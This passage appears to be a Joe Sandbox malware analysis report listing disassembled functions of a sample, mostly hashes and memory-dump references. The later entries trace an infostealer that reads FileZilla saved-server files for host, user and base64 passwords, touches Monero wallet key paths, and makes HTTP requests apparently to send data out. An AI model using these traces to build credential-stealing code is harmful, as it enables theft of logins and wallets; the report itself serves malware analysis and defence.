                              • Instruction Fuzzy Hash: 86A130B2A00A19CBEB19CF55DCC5A9EBBB1FB54314F14C62AD41AE73A0D374A944CF60
                              Function 00504288 Relevance: .2, Instructions: 240COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                              • Instruction ID: 2ea396717579671a7ad1e867b18d2061ff01de235b63543a2d76933d7c414c78
                              • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                              • Instruction Fuzzy Hash: 64A16F72A083519BD308CF25C89075FF7E2EFC8710F1ACA3DA89997254D774E9419B82
                              Function 008EDC86 Relevance: .2, Instructions: 185COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 43c91ae2cb59c2727e22459afa8e59ab23d9e90f9e409d4d06503a431309c4d7
                              • Instruction ID: c8e9fe0f38b1138f0aace17159bd3180c61dcbf5b68b9c2155af31df443f3c8a
                              • Opcode Fuzzy Hash: 43c91ae2cb59c2727e22459afa8e59ab23d9e90f9e409d4d06503a431309c4d7
                              • Instruction Fuzzy Hash: BF5191F3A1C2009FE704AE28EC9577ABBE4EF59310F160A3DE6C9D3750E67598048796
                              Function 0084105C Relevance: .2, Instructions: 164COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 38bcdef0cb029f6c930de9edee705cca00591ebb82a38552d44e504d4df202a9
                              • Instruction ID: 745f08ac7bb4b8a65534ec7331c14e322602a7ffb60908fd61d066122b5b0bac
                              • Opcode Fuzzy Hash: 38bcdef0cb029f6c930de9edee705cca00591ebb82a38552d44e504d4df202a9
                              • Instruction Fuzzy Hash: C351C8F3E086049BE3106E3DDC8575ABBE2EB94310F16493CDBD897384EA3958558787
                              Function 008073D9 Relevance: .1, Instructions: 137COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d63777e0680ef85157fac295fbbfb73cbf9fade8b886c57396e8c0f011f66177
                              • Instruction ID: f9bf1db3038f3b16f98a803636e2259b2402157f91f2faf01699bd7d57b01b68
                              • Opcode Fuzzy Hash: d63777e0680ef85157fac295fbbfb73cbf9fade8b886c57396e8c0f011f66177
                              • Instruction Fuzzy Hash: 6D41E4F36086009BE314AE2DEC907BBB7E5EB98320F07453DE6C5C7780DA3958058796
                              Function 00536799 Relevance: .1, Instructions: 131COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                              • Instruction ID: 4747572db6ee80094fa12bb6491e7e2b897a8a8b5c2f5a2b4aaafccbc7f04f39
                              • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                              • Instruction Fuzzy Hash: 61512B62E09BD589C7058B7544502EEFFB26FE6210F1E829EC4981F383C3759689D3E5
                              Function 00833AB4 Relevance: .1, Instructions: 129COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1960d18d620e2179c633de1b9f170826e6bdf2a2217d71cc7ecf6266c463048b
                              • Instruction ID: 7935c692901f427017a985313f090ab13025c5f1359e7463e711ae08ae45707d
                              • Opcode Fuzzy Hash: 1960d18d620e2179c633de1b9f170826e6bdf2a2217d71cc7ecf6266c463048b
                              • Instruction Fuzzy Hash: 394125B3A182101BF3585938DD6677776D6DBD4320F3E863DAB95C77C4E83C98024685
                              Function 00507588 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                              • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                              • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                              • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                              Function 004D9AA0 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 004D03B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004D8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004D8F9B
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004CA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004CA13C
                                • Part of subcall function 004CA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004CA161
                                • Part of subcall function 004CA110: LocalAlloc.KERNEL32(00000040,?), ref: 004CA181
                                • Part of subcall function 004CA110: ReadFile.KERNEL32(000000FF,?,00000000,004C148F,00000000), ref: 004CA1AA
                                • Part of subcall function 004CA110: LocalFree.KERNEL32(004C148F), ref: 004CA1E0
                                • Part of subcall function 004CA110: CloseHandle.KERNEL32(000000FF), ref: 004CA1EA
                                • Part of subcall function 004D8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004D8FE2
                              • GetProcessHeap.KERNEL32(00000000,000F423F,004E0DBF,004E0DBE,004E0DBB,004E0DBA), ref: 004D04C2
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D04C9
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 004D04E5
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D04F3
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 004D052F
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D053D
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 004D0579
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D0587
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004D05C3
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D05D5
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D0662
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D067A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D0692
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D06AA
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 004D06C2
                              • lstrcat.KERNEL32(?,profile: null), ref: 004D06D1
                              • lstrcat.KERNEL32(?,url: ), ref: 004D06E0
                              • lstrcat.KERNEL32(?,00000000), ref: 004D06F3
                              • lstrcat.KERNEL32(?,004E1770), ref: 004D0702
                              • lstrcat.KERNEL32(?,00000000), ref: 004D0715
                              • lstrcat.KERNEL32(?,004E1774), ref: 004D0724
                              • lstrcat.KERNEL32(?,login: ), ref: 004D0733
                              • lstrcat.KERNEL32(?,00000000), ref: 004D0746
                              • lstrcat.KERNEL32(?,004E1780), ref: 004D0755
                              • lstrcat.KERNEL32(?,password: ), ref: 004D0764
                              • lstrcat.KERNEL32(?,00000000), ref: 004D0777
                              • lstrcat.KERNEL32(?,004E1790), ref: 004D0786
                              • lstrcat.KERNEL32(?,004E1794), ref: 004D0795
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D07EE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 763e65dabe75c0a2b851c54bbec62cf2a822aedae1b53c99afd18019d0b63d69
                              • Instruction ID: f09cd81198598c6974120fbb186b46d6d929c425ca7add90c740dd032b0dd91a
                              • Opcode Fuzzy Hash: 763e65dabe75c0a2b851c54bbec62cf2a822aedae1b53c99afd18019d0b63d69
                              • Instruction Fuzzy Hash: 4AD18171910108ABCB04EBE1DDAAEEE7339AF14705F10855FF102672A5DF38BA55CB29
                              Function 004C59B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004C4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004C4889
                                • Part of subcall function 004C4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004C4899
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004C5A48
                              • StrCmpCA.SHLWAPI(?,012AE8D8), ref: 004C5A63
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004C5BE3
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,012AE8C8,00000000,?,012AA570,00000000,?,004E1B4C), ref: 004C5EC1
                              • lstrlen.KERNEL32(00000000), ref: 004C5ED2
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 004C5EE3
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C5EEA
                              • lstrlen.KERNEL32(00000000), ref: 004C5EFF
                              • lstrlen.KERNEL32(00000000), ref: 004C5F28
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004C5F41
                              • lstrlen.KERNEL32(00000000,?,?), ref: 004C5F6B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004C5F7F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004C5F9C
                              • InternetCloseHandle.WININET(00000000), ref: 004C6000
                              • InternetCloseHandle.WININET(00000000), ref: 004C600D
                              • HttpOpenRequestA.WININET(00000000,012AE778,?,012AE0E0,00000000,00000000,00400100,00000000), ref: 004C5C48
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                              • InternetCloseHandle.WININET(00000000), ref: 004C6017
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
